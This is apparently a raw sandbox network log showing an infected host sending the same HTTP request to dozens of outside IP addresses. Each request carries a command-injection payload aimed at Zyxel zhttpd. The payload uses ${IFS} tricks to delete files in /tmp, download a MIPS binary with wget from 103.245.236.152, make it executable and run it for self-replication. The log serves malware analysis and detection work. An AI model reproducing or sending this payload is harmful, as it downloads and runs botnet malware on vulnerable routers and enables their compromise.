                                      Jan 14, 2024 15:50:33.998063087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1076192.168.2.145905480.228.240.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998090029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1077192.168.2.1449952175.120.131.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998121977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1078192.168.2.145832432.159.184.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998171091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1079192.168.2.1451044182.18.61.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998191118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1080192.168.2.144678263.149.31.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998260021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1081192.168.2.145437481.160.189.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998292923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1082192.168.2.145738643.201.84.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998337030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1083192.168.2.144242251.170.57.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998357058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1084192.168.2.1432784184.87.114.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998415947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1085192.168.2.145270649.31.63.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998445988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1086192.168.2.1454008155.177.221.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998507023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1087192.168.2.145113278.59.24.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998533010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1088192.168.2.1436638105.123.146.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998581886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1089192.168.2.1434710115.97.0.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998616934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1090192.168.2.1452846201.32.84.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998652935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1091192.168.2.1441028202.30.58.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998692036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1092192.168.2.1453720107.220.187.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998719931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1093192.168.2.1433746135.249.213.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998753071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1094192.168.2.1437246131.152.3.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998804092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1095192.168.2.1438356195.80.58.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998850107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1096192.168.2.1455162208.126.78.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998907089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1097192.168.2.1434678180.158.9.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998955011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1098192.168.2.1434178162.172.60.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.998990059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1099192.168.2.144856660.141.144.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999042988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1100192.168.2.1456648143.159.234.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999094963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1101192.168.2.143511686.30.164.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999131918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1102192.168.2.145001294.114.127.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999161005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1103192.168.2.1451762134.43.159.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999197960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1104192.168.2.1435090112.166.132.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999224901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1105192.168.2.1451640118.7.200.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999274969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1106192.168.2.1453546179.136.103.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999335051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1107192.168.2.144502891.196.41.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999377012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1108192.168.2.1442350179.65.74.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999403954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1109192.168.2.145271861.93.230.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999425888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1110192.168.2.145745252.12.89.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999480963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1111192.168.2.1449730161.142.75.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999512911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1112192.168.2.1433590150.120.170.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999530077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1113192.168.2.1443288196.122.165.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999576092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1114192.168.2.1453830117.36.196.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999614954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1115192.168.2.1432782192.170.57.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999650955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1116192.168.2.14539262.190.101.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999696970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1117192.168.2.1433328149.181.50.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999725103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1118192.168.2.1442828153.22.152.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999772072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1119192.168.2.1442226122.98.45.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999805927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1120192.168.2.1447632139.18.40.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999835014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1121192.168.2.14579565.125.181.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999872923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1122192.168.2.144668674.173.14.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999912977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1123192.168.2.145045893.97.180.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999943972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1124192.168.2.1450288219.175.141.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:33.999989033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1125192.168.2.1449826121.106.194.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000046968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1126192.168.2.1445592209.188.237.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000077963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1127192.168.2.145028096.161.222.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000147104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1128192.168.2.1451046117.181.223.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000173092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1129192.168.2.1445008204.221.62.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000209093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1130192.168.2.145421288.4.60.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000267029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1131192.168.2.1457782144.158.94.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000308037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1132192.168.2.1440938136.211.101.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000351906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1133192.168.2.143395642.58.132.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000401974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1134192.168.2.144261092.131.90.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000427008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1135192.168.2.1452520113.88.195.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000466108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1136192.168.2.143855691.10.191.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000504017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1137192.168.2.1457778106.62.187.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.000554085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1138192.168.2.1460758159.118.119.20443
                                      TimestampBytes transferredDirectionData
